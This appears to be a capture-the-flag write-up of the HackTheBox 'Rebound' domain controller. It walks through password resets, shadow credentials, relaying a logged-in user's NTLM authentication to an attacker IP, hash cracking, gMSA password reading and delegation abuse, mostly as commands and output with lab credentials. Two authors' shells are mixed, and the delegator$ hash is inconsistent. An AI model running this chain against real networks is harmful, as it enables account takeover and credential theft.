With full control over the ServiceMGMT OU, I get the same control over the users in that OU, most interesting WinRM_SVC. There are many ways to get access as that user from here. I’ll show two.
Change Password
The most obvious way I could think of was to just change the user’s password. This can be done with bloodyAD:
┌──(puck㉿kali)-[~/vulnlab/delegate/krbrelayx/bloodyAD] └─$ python3 bloodyAD.py -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password winrm_svc 'LeetPassword123!' [+] Password changed successfully!
And now I have access:
nxc winrm dc01.rebound.htb -u winrm_svc -p 'LeetPassword123!' WINRM 10.10.11.231 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb) WINRM 10.10.11.231 5985 DC01 [+] rebound.htb\winrm_svc:LeetPassword123! (Pwn3d!)
And can get a shell:
evil-winrm -i dc01.rebound.htb -u winrm_svc -p 'LeetPassword123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
rebound\winrm_svc
Shadow Cred
A more careful way (and the author’s suggested method) is to use a Shadow Credential, similar to what I showed in Absolute and Outdated.
oxdf@hacky$ certipy shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '944a2974-ff0a-2169-27cb-7729bc77e22b'
[*] Adding Key Credential with device ID '944a2974-ff0a-2169-27cb-7729bc77e22b' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '944a2974-ff0a-2169-27cb-7729bc77e22b' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512
That provides the hash for the account, which I can use with Evil-WinRM:
evil-winrm -i dc01.rebound.htb -u winrm_svc -H 4469650fd892e98933b4536d2e86e512
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
This method is far superior, in that it’s more stealthy (I haven’t modified the password, only added alternative credentials).
Auth as TBrady
Enumeration
File System
There’s nothing else in winrm_svc’s home directory:
*Evil-WinRM* PS C:\Users\winrm_svc> ls -recurse .
Directory: C:\Users\winrm_svc
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/8/2023 2:10 AM Desktop
d-r--- 8/31/2023 10:50 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/6/2024 5:35 AM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc>
Nothing jumps out as interesting in C:\Program Files or C:\Program Files (x86). The root of the file system is pretty bare, with only the empty Shared folder (presumably the SMB share) at all unusual:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/7/2023 8:10 AM PerfLogs
d-r--- 8/28/2023 8:26 PM Program Files
d----- 7/20/2021 12:23 PM Program Files (x86)
d----- 8/25/2023 2:46 PM Shared
d-r--- 4/8/2023 3:12 AM Users
d----- 3/17/2024 4:50 PM Windows
ADCS
There’s nothing interesting with ADCS. Getting certipy working was slightly interesting, so I’ll show that here (though one can skip to the next section without missing anything as far as solving the box).
When I run the standard certipy search to look for vulnerable templates, it fails due to LDAP channel binding (just like above):
oxdf@hacky$ certipy find -dc-ip 10.10.11.231 -ns 10.10.11.231 -u oorend@rebound.htb -p '1GR8t@$$4u' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: Failed to bind to LDAP. LDAP channel binding or signing is required. Use -scheme ldaps -ldap-channel-binding
[-] Use -debug to print a stacktrace
It is nice enough to tell me two options to add. Trying to run this again raises another error:
oxdf@hacky$ certipy find -dc-ip 10.10.11.231 -ns 10.10.11.231 -u ldap_monitor@rebound.htb -p '1GR8t@$$4u' -vulnerable -stdout -scheme ldaps -ldap-channel-binding
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: To use LDAP channel binding, install the patched ldap3 module: pip3 install git+https://github.com/ly4k/ldap3
[-] Use -debug to print a stacktrace
After installing the module, it works:
certipy-ad find -dc-ip 10.10.11.231 -ns 10.10.11.231 -u oorend@rebound.htb -p '1GR8t@$$4u' -vulnerable -stdout -scheme ldaps -ldap-channel-binding
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'rebound-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'rebound-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'rebound-DC01-CA' via RRP
[*] Got CA configuration for 'rebound-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : rebound-DC01-CA
DNS Name : dc01.rebound.htb
Certificate Subject : CN=rebound-DC01-CA, DC=rebound, DC=htb
Certificate Serial Number : 42467DADE6281F8846DC3B6CEE24740D
Certificate Validity Start : 2023-04-08 13:55:49+00:00
Certificate Validity End : 2122-04-08 14:05:49+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : REBOUND.HTB\Administrators
Access Rights
ManageCertificates : REBOUND.HTB\Administrators
REBOUND.HTB\Domain Admins
REBOUND.HTB\Enterprise Admins
ManageCa : REBOUND.HTB\Administrators
REBOUND.HTB\Domain Admins
REBOUND.HTB\Enterprise Admins
Enroll : REBOUND.HTB\Authenticated Users
Certificate Templates : [!] Could not find any certificate templates
Though in working it fails to find any vulnerable templates.
Processes
Looking at the running processes, something interesting:
*Evil-WinRM* PS C:\Users\winrm_svc> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
408 33 12768 21540 2760 0 certsrv
470 19 2288 5564 392 0 csrss
268 16 2224 5232 504 1 csrss
357 15 3476 14940 5704 1 ctfmon
394 33 16268 25048 2844 0 dfsrs
158 8 1936 6400 2264 0 dfssvc
289 14 3880 13824 3928 0 dllhost
5379 5807 69404 71476 2852 0 dns
601 26 24416 53876 1008 1 dwm
1503 59 25524 89508 972 1 explorer
53 6 1504 4724 2728 0 fontdrvhost
53 6 1784 5444 2736 1 fontdrvhost
0 0 56 8 0 0 Idle
142 13 2164 6028 2880 0 ismserv
2393 186 51300 69544 652 0 lsass
483 35 51952 65720 2796 0 Microsoft.ActiveDirectory.WebServices
254 13 2876 10708 4404 0 msdtc
646 92 299852 318340 3036 0 MsMpEng
0 14 384 10332 88 0 Registry
236 12 2776 17220 2552 1 RuntimeBroker
230 12 2280 12924 5540 1 RuntimeBroker
293 15 5560 16988 6136 1 RuntimeBroker
681 33 20184 73792 5968 1 SearchUI
276 12 2936 12588 5904 0 SecurityHealthService
621 14 5552 13364 632 0 services
777 30 17136 60496 2004 1 ShellExperienceHost
456 17 4888 25048 2608 1 sihost
53 3 520 1220 280 0 smss
130 7 1292 6096 68 0 svchost
286 13 4248 11632 336 0 svchost
216 12 1980 10132 712 0 svchost
152 9 1696 6880 772 0 svchost
--snip--
118 8 1608 6156 6020 0 svchost
1761 0 192 160 4 0 System
182 11 2128 11460 2892 1 taskhostw
213 16 2516 11308 3844 0 vds
174 12 2948 11012 2996 0 VGAuthService
148 8 1700 7444 3016 0 vm3dservice
141 9 1804 7956 3408 1 vm3dservice
142 9 1812 8040 6064 1 vm3dservice
240 18 5116 15740 2888 1 vmtoolsd
395 23 9820 22784 3024 0 vmtoolsd
172 11 1416 7116 496 0 wininit
283 12 2588 12944 560 1 winlogon
389 19 11480 22076 3716 0 WmiPrvSE
791 27 56684 73940 0.69 1488 0 wsmprovhost
976 26 56616 73796 0.36 4416 0 wsmprovhost
*Evil-WinRM* PS C:\Users\winrm_svc>
There’s a bunch of processes in session 1. Typically on HTB machines when no one is logged in, I’ll see LogonUI and a couple other processes, but here explorer is running, and it looks like someone is actually logged in.
Session
qwinsta is the command to display information about the session host, but it fails:
*Evil-WinRM* PS C:\> qwinsta *
qwinsta.exe : No session exists for *
+ CategoryInfo : NotSpecified: (No session exists for *:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
I came across this Security Stack Exchange post, which doesn’t explain why, but shows that RunasCs.exe makes it work (and this author is likely trying to solve Rebound). I’ll download the latest release and upload it to Rebound:
*Evil-WinRM* PS C:\Users\winrm_svc> cd c:\windows\tasks
*Evil-WinRM* PS C:\windows\tasks> upload RunasCs.exe
Info: Uploading /home/puck/htb/rebound/RunasCs.exe to C:\windows\tasks\RunasCs.exe
Data: 64852 bytes of 64852 bytes copied
Info: Upload successful!
Now only does it work, but it shows the TBrady user is logged in:
*Evil-WinRM* PS C:\windows\tasks> .\RunasCs.exe x x qwinsta -l 9 SESSIONNAME USERNAME ID STATE TYPE DEVICE >services 0 Disc console tbrady 1 Active *Evil-WinRM* PS C:\windows\tasks>
BloodHound
TBrady has ReadGMSAPassword on the Delegator$ account, which seems like it might be interesting:
It seems like that’s my current target.
Cross Session Relay
I’m going to abuse the logged in session by TBrady by triggering an authentication back to my box and relaying it to dump a hash. I did something similar in Absolute, but there I got the administrator account, which allowed me to just add an admin user and be done. Here I’ll be targeting the TBrady user, so what I can get via relay is more limited.
There’s a couple ways to do this:
- RemotePotato0
- KrbRelay
I’ll show both.
RemotePotato0
RemotePotato0 is a tool that:
It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.
Here, since I’ll be targeting a non-admin user, I’ll focus on the hash grab. I’ll upload the latest release:
*Evil-WinRM* PS C:\windows\tasks> upload RemotePotato0.exe Info: Uploading /home/puck/htb/rebound/RemotePotato0.exe to C:\windows\tasks\RemotePotato0.exe Data: 235520 bytes of 235520 bytes copied Info: Upload successful!
To run it, I’ll use the following options:
-m 2– method 2, “Rpc capture (hash) server + potato trigger”-s 1– the session of the user to target-x 10.10.14.6– set the rogue Oxid resolver IP to mine-p 9999– the port I’ll relay back to the host; not necessary since this is default, but good to explicitly state
These kind of RPC connections will only target TCP 135. Since I can’t listen on TCP 135 on Rebound (it’s already listening with the legit RPC service), I’ll have the exploit target my host, and then forward that back to RemotePotato0 on 9999. I’ll run socat on my box sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999. So the traffic will hit my host on 135 and go back to Rebound on 9999, where RemotePotato0 is listening.
When I run this, it dumps a NetNTMLv2 hash for TBrady:
*Evil-WinRM* PS C:\programdata> .\RemotePotato0.exe -m 2 -s 1 -x 10.10.14.6 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP::9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:2c38764642ea2aeb:216c7642dd3e5224eed40910c4aff73f:010100000000000097a7c86cdd79da01915a74c607bc396c0000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080097a7c86cdd79da0106000400060000000800300030000000000000000100000000200000a389c9930c336bbf842c62a142e75c43b5dd50518b92fc846dace683e90c00b90a00100000000000000000000000000000000000090000000000000000000000
KrbRelay
I’ll clone KrbRelay to my Windows VM and compile it in Visual Studio (just like in Absolute). I’ll upload it to Rebound:
*Evil-WinRM* PS C:\windows\tasks> upload KrbRelay.exe
Info: Uploading /home/puck/htb/rebound/KrbRelay.exe to C:\windows\tasks\KrbRelay.exe
Data: 2158592 bytes of 2158592 bytes copied
Info: Upload successful!
I’ll run it just like the example in the README.md under NTLM, except I’ll use RunasCs.exe to get into a /netonly like session just like with qwinsta:
*Evil-WinRM* PS C:\windows\tasks> .\RunasCs.exe x x -l 9 "C:\windows\tasks\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm" [*] Auth Context: rebound\tbrady [*] Rewriting function table [*] Rewriting PEB [*] GetModuleFileName: System [*] Init com server [*] GetModuleFileName: C:\windows\tasks\KrbRelay.exe [*] Register com server objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACXNrfG2afFtt+mmOcTveN2AnAAAAwH//+LiMS0DChaaCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==: [*] Forcing cross-session authentication [*] Using CLSID: 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 [*] Spawning in session 1 [*] NTLM1 4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44 [*] NTLM2 4e544c4d53535000020000000e000e003800000015c299e25e3117d193c70ede000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b1725d661648db010000000000000000000000000000000000000000000000005070da111f0001000b010000 [*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED [*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons [*] NTLM3 tbrady::rebound:5e3117d193c70ede:07a0ea4a55e219f5845563c9e62acce4:0101000000000000b1725d661648db017cda780f4b7591a80000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b1725d661648db010600040006000000080030003000000000000000010000000020000091d22f042a4f1c3e0b5c76976b12e532103c998e688cf7a233200e46499309fd0a00100000000000000000000000000000000000090000000000000000000000 System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)) at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults) at KrbRelay.Program.Main(String[] args) *Evil-WinRM* PS C:\windows\tasks>
.
It also gives a NetNTLMv2 hash.
Crack Hash
Regardless of how I collected the NetNTLMv2 hash (really more a challenge / response than a hash), I can save it to a file and give it to hashcat:
hashcat tbrady_hash3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
TBRADY::rebound:5e3117d193c70ede:07a0ea4a55e219f5845563c9e62acce4:0101000000000000b1725d661648db017cda780f4b7591a80000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800b1725d661648db010600040006000000080030003000000000000000010000000020000091d22f042a4f1c3e0b5c76976b12e532103c998e688cf7a233200e46499309fd0a00100000000000000000000000000000000000090000000000000000000000:543BOMBOMBUNmanda
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TBRADY::rebound:5e3117d193c70ede:07a0ea4a55e219f584...000000
Time.Started.....: Fri Dec 6 20:43:55 2024 (5 secs)
.
The hash cracks as “543BOMBOMBUNmanda”.
Auth Check
These creds work for SMB and LDAP, but not WinRM:
nxc smb dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\tbrady:543BOMBOMBUNmanda
nxc winrm dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda
WINRM 10.10.11.231 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
WINRM 10.10.11.231 5985 DC01 [-] rebound.htb\tbrady:543BOMBOMBUNmanda
nxc ldap dc01.rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k
SMB dc01.rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS dc01.rebound.htb 636 DC01 [+] rebound.htb\tbrady
.
The lack of WinRM isn’t surprising, as TBrady is lacking any group that would enable that:
Auth as delegator$
Recover Hash
TBrady has ReadGMSAPassword over the delegator$ account. I’ll show three different tools to collect the NTLM hash of delegator$ using GMSA.
bloodyAD
I already noted above that TBrady has ReadGMSAPassword on Delegator$. This page from Hacker Recipes has a bunch of ways to do it. I’ll use bloodyAD to dump it:
python3 bloodyAD.py -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:4ba33add1108fe560429fc27a1bcab6b msDS-ManagedPassword.B64ENCODED: NikXxFjQpBQrJqGAoSwQfOJIcS4wKNsur+HWUgv8o4fs6tlKg8aqiw1hINqtW2YwYl8Z1aO6AMsosv4kx81YKfH7AuhmB+vzCKB4VyXKmtEx390JWrBXHcNKcxlygf8Urs3g+RNlodOEx0FDGsoFRZ1Lq1nJetOTSLVY/sVm4q/jHbWxsmCsXenE6XK5a8z5q3yD6Mx4Ho3CdnVB110Ac24SxV1t+tKPsZ1Q1bbhhF7bf37jTiz9v6hsSZVNWgmxfDPg02n1oaViqh+XRdZnLtEs6i5O3HiAEtWYJdjEm0Qc2DCSupQRA5HSeZ51mEauBRRHyUhIjZeAuGckCFyYew==
GMSAPasswordReader.exe
Alternatively, the BloodHound documentation suggests GMSAPasswordReader. I’ll clone the repo and build it in my Windows VM, and then upload it to Rebound:
*Evil-WinRM* PS C:\windows\tasks> upload GMSAPasswordReader.exe
Info: Uploading /home/puck/htb/rebound/GMSAPasswordReader.exe to C:\windows\tasks\GMSAPasswordReader.exe
Data: 140628 bytes of 140628 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\windows\tasks>
Running it as TBrady should works ( but not for me ) :
*Evil-WinRM* PS C:\ProgramData> .\RunasCs.exe tbrady 543BOMBOMBUNmanda -l 2 "\programdata\GMSAPasswordReader.exe --accountname delegator$"
[*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
netexec
netexec can get the NTLM for the delegator$ account as well:
nxc ldap rebound.htb -u tbrady -p 543BOMBOMBUNmanda -k --gmsa SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False) LDAPS rebound.htb 636 DC01 [+] rebound.htb\tbrady:543BOMBOMBUNmanda LDAPS rebound.htb 636 DC01 [*] Getting GMSA Passwords LDAPS rebound.htb 636 DC01 Account: delegator$ NTLM: 4ba33add1108fe560429fc27a1bcab6b
Auth Check
The hash works for SMB and LDAP but not WinRM:
nxc smb dc01.rebound.htb -u 'delegator$' -H 4ba33add1108fe560429fc27a1bcab6b
SMB 10.10.11.231 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\delegator$:4ba33add1108fe560429fc27a1bcab6b
nxc ldap dc01.rebound.htb -u 'delegator$' -H 4ba33add1108fe560429fc27a1bcab6b -k
SMB dc01.rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS dc01.rebound.htb 636 DC01 [+] rebound.htb\delegator$
nxc winrm dc01.rebound.htb -u 'delegator$' -H 4ba33add1108fe560429fc27a1bcab6b
WINRM 10.10.11.231 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
WINRM 10.10.11.231 5985 DC01 [-] rebound.htb\delegator$:4ba33add1108fe560429fc27a1bcab6b
Shell as Administrator
Enumeration
In Bloodhound, looking at the now owned Delegator object, there’s information about delegation:
It does not have unconstrained delegation, but it is allow to delegate HTTP for the dc01 machine object. It also has a SPN of browser/dc01.rebound.htb.
The Impacket script findDelegation.py will also show this:
impacket-findDelegation 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :4ba33add1108fe560429fc27a1bcab6b Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Getting machine hostname [-] CCache file is not found. Skipping... [-] CCache file is not found. Skipping... AccountName AccountType DelegationType DelegationRightsTo ----------- ----------------------------------- -------------- --------------------- delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb
Constrained Delegation
Background
To think about constrained delegation, let’s take an example of a web server and a database server. The user auths to the webserver, and the by sending it’s Service Ticket (ST, also known as Ticket Granting Service or TGS ticket) to the webserver. The webserver wants to auth as the user to the DB to only get stuff that the user is allowed to access. It sends a special TGS request to the DC asking for auth to the DC, and attaching the ST or TGS ticket from the user. The DC will check that the webserver is allowed to delegate to the DB server and that the ST / TGS ticket from the user has the forwardable flag. If so, it returns a ST / TGS ticket that says this is the user trying to access the DB. This all makes use of the S4U2Proxy extension.
So what happens is the user doesn’t use Kerberos to authenticate to the web server (perhaps NTLM)? The web server needs a ST / TGS ticket for the user to the web server to request one for the DB. The web server can request a ST / TGS ticket from the DC for the user to the webserver using the S4U2Self extension. This ticket will only come back with the forwardable flag if the delegation is configured as “Constrained w/ Protocol Transition”.
The delegation above doesn’t have the “w/ Protocol Transition” part, so I can’t just request a ST / TGS ticket and get access as any user to the DC.
Demonstration
To demonstrate this, running getST.py fails:
oxdf@hacky$ getST.py -spn http/dc01.rebound.htb -impersonate administrator 'rebound.htb/delegator$' -hashes :E1630B0E18242439A50E9D8B5F5B7524
Impacket v0.12.0.dev1+20240308.164415.4a62f39 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user delegator$ or initial TGT not forwardable
It is using S4U2Self to get a ticket for the administrator user for delegator$, and then trying to use S4U2Proxy to forward it, but it doesn’t work. The -self flag tells getSt.py to stop after the S4U2Self, getting a ticket for administrator for delegator$. The resulting ticket is missing the forwardable flag:
Click for full size imageResource-Based Constrained Delegation
Background
In the above constrained delegation, the DC tracked on the web server object that it was allowed to delegate (without protocol transition) for the DB. In resource-based constrained delegation, it’s similar, but the DC tracks a trusted list of accounts on the DB object what services are allowed to delegate to it, and the resource can modify it’s own list.
Add ldap_monitor to delegator$
To move forward with this attack, I’m going to set ldap_monitor as a trusted to delegate account for delegator$ using the rbcd.py script from Impacket.
rebound/delegator$– The account to target. Will auth as this account to the DC.-hashes :E1630B0E18242439A50E9D8B5F5B7524– The hashes for this account to authenticate.-k– Use Kerberos authentication (it will use the hash to get a ticket).-delegate-from ldap_monitor– Set thatldap_monitoris allow to delegate.delegate-to 'delegator$'– Set the it is allow to delegate for delegator$.-action write–writeis to set the value. Other choices for-actionareread,remove, andflush.-dc-ip dc01.rebound.htb– Tell it where to find the DC.-use-ldaps– Fixes the binding issues described above.
All of this together updates the RBCD list:
impacket-rbcd 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] CCache file is not found. Skipping... [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
.
impacket-findDelegation 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Getting machine hostname [-] CCache file is not found. Skipping... [-] CCache file is not found. Skipping... AccountName AccountType DelegationType DelegationRightsTo ------------ ----------------------------------- -------------------------- --------------------- ldap_monitor Person Resource-Based Constrained delegator$ delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb
.
One other note – I lost a ton of time getting “invalid server address” errors for not having “dc01” associated with the IP of the box in my /etc/hosts file.
Get ST / TGS Ticket for DC01$ on delegator$
Now, the ldap_monitor account is able to request a service ticket as any user on delegator$. I’m going to target the DC computer account, because the administrator account is marked as sensitive, which gives the NOT_DELEGATED flag:
┌──(puck㉿kali)-[~/htb/rebound/powerview.py]
└─$ powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb
Logging directory is set to /home/puck/.powerview/logs/rebound-oorend-rebound.htb
[2024-12-06 21:22:28] Channel binding is enforced!
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainUser -Identity Administrator
cn : Administrator
description : Built-in account for administering the computer/domain
distinguishedName : CN=Administrator,CN=Users,DC=rebound,DC=htb
memberOf : CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb
CN=Domain Admins,CN=Users,DC=rebound,DC=htb
CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
CN=Schema Admins,CN=Users,DC=rebound,DC=htb
CN=Administrators,CN=Builtin,DC=rebound,DC=htb
name : Administrator
objectGUID : {37857665-6e2e-4f12-9976-5c9babcd8282}
userAccountControl : NORMAL_ACCOUNT [1114624]
DONT_EXPIRE_PASSWORD
NOT_DELEGATED
badPwdCount : 1
badPasswordTime : 06/12/2024 17:01:28 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 06/12/2024 13:35:55 (today)
pwdLastSet : 08/04/2023 09:11:04 (1 year, 7 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-500
adminCount : 1
sAMAccountName : Administrator
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV >
I’ll get a ST / TGS ticket as DC01$ on delegator$ with getST.py:
There is a cleanup script resetting delegation, so if this doesn’t work, I’ll make sure to re-run the rbcd.py script !
┌──(puck㉿kali)-[~/htb/rebound]
└─$ impacket-rbcd 'rebound.htb/delegator$' -hashes :4ba33add1108fe560429fc27a1bcab6b -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
┌──(puck㉿kali)-[~/htb/rebound]
└─$ impacket-getST 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate DC01$
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
